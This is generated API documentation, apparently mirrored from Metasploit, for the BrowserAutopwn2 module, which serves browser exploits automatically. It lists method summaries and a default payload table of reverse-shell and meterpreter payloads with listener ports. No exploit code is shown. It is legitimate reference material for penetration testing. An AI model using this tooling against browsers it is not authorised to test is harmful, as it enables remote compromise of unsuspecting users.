adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/BrowserAutopwn2.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

4776 lines
205 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::BrowserAutopwn2
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::BrowserAutopwn2";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (B)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">BrowserAutopwn2</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::BrowserAutopwn2
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="BrowserExploitServer.html" title="Msf::Exploit::Remote::BrowserExploitServer (module)">BrowserExploitServer</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/browser_autopwn2.rb</dd>
</dl>
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="DEFAULT_PAYLOADS-constant" class="">DEFAULT_PAYLOADS =
<div class="docstring">
<div class="discussion">
<p>The default platform-specific payloads and preferred LPORTS. The hash key is the name of the platform that matches whats on the module. The loader order is specific while starting them up. Firefox payloads use generic handlers.</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbrace'>{</span>
<span class='label'>firefox:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>firefox/shell_reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4442</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>android:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>android/meterpreter/reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4443</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>win:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>windows/meterpreter/reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4444</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>linux:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>linux/x86/meterpreter/reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4445</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>unix:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>cmd/unix/reverse</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4446</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>osx:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>osx/x86/shell_reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4447</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>java:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>java/meterpreter/reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4448</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>generic:</span> <span class='lbrace'>{</span> <span class='label'>payload:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>generic/shell_reverse_tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>lport:</span> <span class='int'>4459</span> <span class='rbrace'>}</span>
<span class='rbrace'>}</span></pre></dd>
</dl>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="BrowserExploitServer.html" title="Msf::Exploit::Remote::BrowserExploitServer (module)">BrowserExploitServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="BrowserExploitServer.html#DEFAULT_COOKIE_NAME-constant" title="Msf::Exploit::Remote::BrowserExploitServer::DEFAULT_COOKIE_NAME (constant)">Msf::Exploit::Remote::BrowserExploitServer::DEFAULT_COOKIE_NAME</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#PROXY_REQUEST_HEADER_SET-constant" title="Msf::Exploit::Remote::BrowserExploitServer::PROXY_REQUEST_HEADER_SET (constant)">Msf::Exploit::Remote::BrowserExploitServer::PROXY_REQUEST_HEADER_SET</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#REQUIREMENT_KEY_SET-constant" title="Msf::Exploit::Remote::BrowserExploitServer::REQUIREMENT_KEY_SET (constant)">Msf::Exploit::Remote::BrowserExploitServer::REQUIREMENT_KEY_SET</a></span></p>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="HttpServer/HTML.html" title="Msf::Exploit::Remote::HttpServer::HTML (module)">HttpServer::HTML</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpServer/HTML.html#UTF_16_BE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_16_BE (constant)">HttpServer::HTML::UTF_16_BE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_16_BE_MARKER-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_16_BE_MARKER (constant)">HttpServer::HTML::UTF_16_BE_MARKER</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_16_LE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_16_LE (constant)">HttpServer::HTML::UTF_16_LE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_32_BE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_32_BE (constant)">HttpServer::HTML::UTF_32_BE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_32_LE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_32_LE (constant)">HttpServer::HTML::UTF_32_LE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_7-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_7 (constant)">HttpServer::HTML::UTF_7</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_7_ALL-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_7_ALL (constant)">HttpServer::HTML::UTF_7_ALL</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_8-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_8 (constant)">HttpServer::HTML::UTF_8</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_NONE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_NONE (constant)">HttpServer::HTML::UTF_NONE</a></span></p>
<h2>Instance Attribute Summary <small><a href="#" class="summary_toggle">collapse</a></small></h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#bap_exploits-instance_method" title="#bap_exploits (instance method)">#<strong>bap_exploits</strong> &#x21d2; Array </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>A list of initialized BAP exploits.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#exploit_job_ids-instance_method" title="#exploit_job_ids (instance method)">#<strong>exploit_job_ids</strong> &#x21d2; Array </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>A list of exploit job IDs.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#payload_job_ids-instance_method" title="#payload_job_ids (instance method)">#<strong>payload_job_ids</strong> &#x21d2; Array </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>A list of payload job IDs.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wanted_payloads-instance_method" title="#wanted_payloads (instance method)">#<strong>wanted_payloads</strong> &#x21d2; Array </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>Wanted payloads.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="SocketServer.html#service-instance_method" title="Msf::Exploit::Remote::SocketServer#service (method)">#service</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#assign_module_resource-instance_method" title="#assign_module_resource (instance method)">#<strong>assign_module_resource</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a unique resource path.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#browser_profile_prefix-instance_method" title="#browser_profile_prefix (instance method)">#<strong>browser_profile_prefix</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a prefix type thats unique to this BAP (based on a timestamp &amp; module uuid).</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#build_html-instance_method" title="#build_html (instance method)">#<strong>build_html</strong>(cli, request) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the HTML that serves our exploits.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#cleanup-instance_method" title="#cleanup (instance method)">#<strong>cleanup</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Cleans up everything such as profiles and jobs.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#configure_job_output-instance_method" title="#configure_job_output (instance method)">#<strong>configure_job_output</strong>(on = true) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Configures the output of sub-jobs.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#finalize_sorted_modules-instance_method" title="#finalize_sorted_modules (instance method)">#<strong>finalize_sorted_modules</strong>(bap_groups) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Modifies @bap_exploit by replacing it with the rearranged module list.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_custom_404_url-instance_method" title="#get_custom_404_url (instance method)">#<strong>get_custom_404_url</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the custom 404 URL set by the user.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_exploit_urls-instance_method" title="#get_exploit_urls (instance method)">#<strong>get_exploit_urls</strong>(cli, request) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a list of exploit URLs.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_payload_lhost-instance_method" title="#get_payload_lhost (instance method)">#<strong>get_payload_lhost</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the selected payloads LHOST.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_selected_payload_lport-instance_method" title="#get_selected_payload_lport (instance method)">#<strong>get_selected_payload_lport</strong>(platform) &#x21d2; Integer </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the selected payloads LPORT.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_selected_payload_name-instance_method" title="#get_selected_payload_name (instance method)">#<strong>get_selected_payload_name</strong>(platform) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a payload name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_suitable_exploits-instance_method" title="#get_suitable_exploits (instance method)">#<strong>get_suitable_exploits</strong>(cli, request) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a list of suitable exploits for the current client based on what #sort_bap_exploits gives us.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#group_bap_modules-instance_method" title="#group_bap_modules (instance method)">#<strong>group_bap_modules</strong> &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Breaks @bap_exploits into groups for sorting purposes.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#init_exploits-instance_method" title="#init_exploits (instance method)">#<strong>init_exploits</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns all the found exploit modules that support BrowserExploitServer by going through all the exploits from the framework object.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#is_ip_targeted%3F-instance_method" title="#is_ip_targeted? (instance method)">#<strong>is_ip_targeted?</strong>(cli_ip) &#x21d2; TrueClass, FalseClass </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns true if the IP is on our whitelist.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#is_multi_platform_exploit%3F-instance_method" title="#is_multi_platform_exploit? (instance method)">#<strong>is_multi_platform_exploit?</strong>(m) &#x21d2; TrueClass, FalseClass </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Checks if the module is multi-platform based on the directory path.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#is_payload_compatible%3F-instance_method" title="#is_payload_compatible? (instance method)">#<strong>is_payload_compatible?</strong>(compatible_payloads, payload_name) &#x21d2; TrueClass, FalseClass </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Checks whether the payload is compatible with the module based on the modules compatibility list.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#is_payload_platform_compatible%3F-instance_method" title="#is_payload_platform_compatible? (instance method)">#<strong>is_payload_platform_compatible?</strong>(m, payload_platform) &#x21d2; TrueClass, FalseClass </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Checks whether the payload is compatible with the module based on platform information.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#is_resource_taken%3F-instance_method" title="#is_resource_taken? (instance method)">#<strong>is_resource_taken?</strong>(resource) &#x21d2; TrueClass, FalseClass </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Checks if a resource is already taken or not.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#log_click-instance_method" title="#log_click (instance method)">#<strong>log_click</strong>(ip, data = &#39;&#39;) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Logs a click that includes the suitable exploit list.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#on_request_uri-instance_method" title="#on_request_uri (instance method)">#<strong>on_request_uri</strong>(cli, request) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Handles client requests specific for BAP.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#parse_rank-instance_method" title="#parse_rank (instance method)">#<strong>parse_rank</strong>(rank) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the human-readable version of the rank.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#rm_exploit_jobs-instance_method" title="#rm_exploit_jobs (instance method)">#<strong>rm_exploit_jobs</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Removes background exploit jobs that belong to BAP.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#rm_payload_jobs-instance_method" title="#rm_payload_jobs (instance method)">#<strong>rm_payload_jobs</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Removes background payload jobs that belong to BAP.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#select_payload-instance_method" title="#select_payload (instance method)">#<strong>select_payload</strong>(m) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns an appropriate payload thats compatible with the module.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#session_count-instance_method" title="#session_count (instance method)">#<strong>session_count</strong> &#x21d2; Integer </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a number of sessions obtained by BAPs payload handlers.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#set_exploit_options-instance_method" title="#set_exploit_options (instance method)">#<strong>set_exploit_options</strong>(xploit) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Modifies an exploits default datastore options.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#setup-instance_method" title="#setup (instance method)">#<strong>setup</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sets up BAPv2.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#show_exploit_list-instance_method" title="#show_exploit_list (instance method)">#<strong>show_exploit_list</strong>(ip, tag, current_exploit_list) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Prints a list of suitable exploits for the current list.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#show_ready_exploits-instance_method" title="#show_ready_exploits (instance method)">#<strong>show_ready_exploits</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Prints all the exploits that BAP will consider using.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#sort_bap_exploits-instance_method" title="#sort_bap_exploits (instance method)">#<strong>sort_bap_exploits</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Modifies @bap_exploits by sorting.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#sort_date_in_group-instance_method" title="#sort_date_in_group (instance method)">#<strong>sort_date_in_group</strong>(bap_groups) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sorts a grouped module list by disclosure date.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#sort_group_by_rank-instance_method" title="#sort_group_by_rank (instance method)">#<strong>sort_group_by_rank</strong>(bap_groups) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sorts a module list by ranking.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#start_exploits-instance_method" title="#start_exploits (instance method)">#<strong>start_exploits</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Starts exploits.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#start_payload_listeners-instance_method" title="#start_payload_listeners (instance method)">#<strong>start_payload_listeners</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Creates payload listeners.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#start_service-instance_method" title="#start_service (instance method)">#<strong>start_service</strong> &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Prints information such as what exploits will be used, and the BAP URL.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="BrowserExploitServer.html" title="Msf::Exploit::Remote::BrowserExploitServer (module)">BrowserExploitServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="BrowserExploitServer.html#cookie_header-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#cookie_header (method)">#cookie_header</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#cookie_name-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#cookie_name (method)">#cookie_name</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#extract_requirements-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#extract_requirements (method)">#extract_requirements</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#get_bad_requirements-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#get_bad_requirements (method)">#get_bad_requirements</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#get_detection_html-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#get_detection_html (method)">#get_detection_html</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#get_module_resource-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#get_module_resource (method)">#get_module_resource</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#get_module_uri-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#get_module_uri (method)">#get_module_uri</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#get_payload-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#get_payload (method)">#get_payload</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#get_target-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#get_target (method)">#get_target</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#has_bad_activex%3F-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#has_bad_activex? (method)">#has_bad_activex?</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#has_proxy%3F-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#has_proxy? (method)">#has_proxy?</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#initialize-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#js_vuln_test-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#js_vuln_test (method)">#js_vuln_test</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#load_swf_detection-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#load_swf_detection (method)">#load_swf_detection</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#on_request_exploit-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#on_request_exploit (method)">#on_request_exploit</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#process_browser_info-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#process_browser_info (method)">#process_browser_info</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#retrieve_tag-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag (method)">#retrieve_tag</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#send_exploit_html-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#send_exploit_html (method)">#send_exploit_html</a></span>, <span class='object_link'><a href="BrowserExploitServer.html#try_set_target-instance_method" title="Msf::Exploit::Remote::BrowserExploitServer#try_set_target (method)">#try_set_target</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Module/UI/Message/Verbose.html" title="Msf::Module::UI::Message::Verbose (module)">Module::UI::Message::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_error-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_error (method)">#vprint_error</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_good-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_good (method)">#vprint_good</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_status-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_status (method)">#vprint_status</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_warning-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_warning (method)">#vprint_warning</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Module/UI/Line/Verbose.html" title="Msf::Module::UI::Line::Verbose (module)">Module::UI::Line::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/UI/Line/Verbose.html#vprint_line-instance_method" title="Msf::Module::UI::Line::Verbose#vprint_line (method)">#vprint_line</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="BrowserProfileManager.html" title="Msf::Exploit::Remote::BrowserProfileManager (module)">BrowserProfileManager</a></span></h3>
<p class="inherited"><span class='object_link'><a href="BrowserProfileManager.html#browser_profile-instance_method" title="Msf::Exploit::Remote::BrowserProfileManager#browser_profile (method)">#browser_profile</a></span>, <span class='object_link'><a href="BrowserProfileManager.html#clear_browser_profiles-instance_method" title="Msf::Exploit::Remote::BrowserProfileManager#clear_browser_profiles (method)">#clear_browser_profiles</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JSObfu.html#initialize-instance_method" title="Msf::Exploit::JSObfu#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../JSObfu.html#js_obfuscate-instance_method" title="Msf::Exploit::JSObfu#js_obfuscate (method)">#js_obfuscate</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../RopDb.html" title="Msf::Exploit::RopDb (module)">Msf::Exploit::RopDb</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../RopDb.html#generate_rop_payload-instance_method" title="Msf::Exploit::RopDb#generate_rop_payload (method)">#generate_rop_payload</a></span>, <span class='object_link'><a href="../RopDb.html#has_rop%3F-instance_method" title="Msf::Exploit::RopDb#has_rop? (method)">#has_rop?</a></span>, <span class='object_link'><a href="../RopDb.html#initialize-instance_method" title="Msf::Exploit::RopDb#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../RopDb.html#rop_junk-instance_method" title="Msf::Exploit::RopDb#rop_junk (method)">#rop_junk</a></span>, <span class='object_link'><a href="../RopDb.html#rop_nop-instance_method" title="Msf::Exploit::RopDb#rop_nop (method)">#rop_nop</a></span>, <span class='object_link'><a href="../RopDb.html#select_rop-instance_method" title="Msf::Exploit::RopDb#select_rop (method)">#select_rop</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="HttpServer/HTML.html" title="Msf::Exploit::Remote::HttpServer::HTML (module)">HttpServer::HTML</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpServer/HTML.html#encrypt_js-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#encrypt_js (method)">#encrypt_js</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#heaplib-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#heaplib (method)">#heaplib</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#initialize-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_ajax_download-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_ajax_download (method)">#js_ajax_download</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_ajax_post-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_ajax_post (method)">#js_ajax_post</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_base64-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_base64 (method)">#js_base64</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_explib2-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_explib2 (method)">#js_explib2</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_explib2_payload-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_explib2_payload (method)">#js_explib2_payload</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_heap_spray-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_heap_spray (method)">#js_heap_spray</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_heaplib2-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_heaplib2 (method)">#js_heaplib2</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_ie_addons_detect-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_ie_addons_detect (method)">#js_ie_addons_detect</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_misc_addons_detect-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_misc_addons_detect (method)">#js_misc_addons_detect</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_mstime_malloc-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_mstime_malloc (method)">#js_mstime_malloc</a></span>, <span class='object_link'><a 